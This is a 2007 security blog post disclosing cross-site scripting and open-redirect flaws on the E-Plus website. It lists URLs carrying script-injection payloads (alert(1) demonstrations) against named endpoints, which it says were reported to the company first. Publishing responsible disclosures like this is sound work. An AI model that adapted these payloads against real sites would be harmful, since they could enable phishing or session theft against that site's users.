XSS on eplus.de

Monday, March 12. 2007

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

Posted by Hanno Böck in Code, English, Security, Webdesign at 19:09 | Comments (0) | Trackback (1)

Defined tags for this entry: eplus, phishing, security, web, xss

Related entries by tags:

Trackbacks

Trackback specific URI for this entry

Don't drink and write
Karlsruhe's Webmonday happened again. It was technical. It was social. It was (maybe not) secure. It was full of ideas. It was all about the people. It was also a chance for some real-life viral marketing for some Austrian pre-mixed cocktails.

Weblog: l.p.g. - flammable gas
Tracked: Mar 13, 22:52

Comments

Display comments as (Linear | Threaded)

No comments

Add Comment

Name
Email
Homepage
In reply to
Comment	E-Mail addresses will not be displayed and will only be used for E-Mail notifications. To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above:
	Remember Information? Subscribe to this entry

About me

You can find my web page with links to my work as a journalist at https://hboeck.de/.

You may also find my newsletter about climate change and decarbonization technologies interesting.

Hanno Böck
mail: hanno@hboeck.de

Hanno on Mastodon

Impressum

Creative Commons

Unless noted otherwise, all content is CC Zero / public domain

Frontpage
Datenschutz / Privacy

XSS on eplus.de

Monday, March 12. 2007

XSS on eplus.de

About me

Creative Commons

Show tagged entries